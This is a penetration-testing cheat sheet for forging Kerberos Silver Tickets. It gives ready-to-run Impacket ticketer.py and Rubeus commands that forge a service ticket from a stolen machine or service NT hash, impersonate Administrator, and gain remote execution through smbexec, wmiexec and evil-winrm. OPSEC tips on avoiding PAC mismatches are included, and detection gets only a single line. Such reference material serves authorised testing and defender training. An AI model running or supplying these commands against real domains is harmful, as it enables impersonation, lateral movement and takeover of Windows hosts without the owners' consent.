Skip to content

Silver Ticket

Forge a service ticket (TGS) offline using a service’s key (machine account or service account) to authenticate only to that service—no KDC contact.

When to use

  • You have the service key (e.g., DC$ NT hash for DC services, or a member server’s machine hash for cifs/host).
  • You know the Domain SID, the target SPN, and a user to impersonate who has rights on the target.

Quick helpers - Get Domain SID: rpcclient -U '<domain>/<user>%<pass>' <dc> -c 'lsaquery' - Common SPNs: cifs/<host> (SMB), HOST/<host> (WMI/DCOM), HTTP/<host> (WinRM/IIS), ldap/<dc> (LDAP on DC)

Linux (Impacket)

1) Generate ticket

ticketer.py -nthash <NTHASH> -domain <DOMAIN.FQDN> -domain-sid <S-1-5-21-...> -spn <SPN>/<host.fqdn> <UserToImpersonate>

Examples: ticketer.py -nthash <DC_MACHINE_NT> -domain corp.local -domain-sid S-1-5-21-... -spn cifs/dc01.corp.local Administrator ticketer.py -nthash <SERVER_MACHINE_NT> -domain corp.local -domain-sid S-1-5-21-... -spn HOST/ws01.corp.local Administrator

2) Load ticket & verify

export KRB5CCNAME=<UserToImpersonate>.ccache && klist

3) Use the ticket (match SPN/tool)

KRB5CCNAME=<User>.ccache smbexec.py -k -no-pass <DOMAIN>/<User>@<host.fqdn> KRB5CCNAME=<User>.ccache wmiexec.py -k -no-pass <DOMAIN>/<User>@<host.fqdn> KRB5CCNAME=<User>.ccache evil-winrm -r <host.fqdn> -S -k

Windows (Rubeus)

1) Forge & inject

Rubeus.exe silver /service:cifs/<host.fqdn> /rc4:<NTHASH> /user:<UserToImpersonate> /domain:<DOMAIN.FQDN> /sid:<S-1-5-21-...> /ptt

(Use /service:HOST/<host> for WMI/DCOM, /service:HTTP/<host> for WinRM/IIS.)

2) Verify

klist

3) Use

dir \\<host>\C$

Notes / OPSEC

  • Scope: Silver tickets work only for the specified SPN; they don’t grant a TGT.
  • Targets: DC services often run as LocalSystemDC$ hash can forge cifs/, ldap/, HOST/ to the DC. Member servers: use that server’s machine hash for cifs/host.
  • User choice: Impersonate an existing user with local admin on the target (e.g., Administrator) to avoid PAC mismatches.
  • Detection: Often no 4769 on DC (no KDC), but target logs 4624 Kerberos logons; look for unusual SIDs/groups/PAC.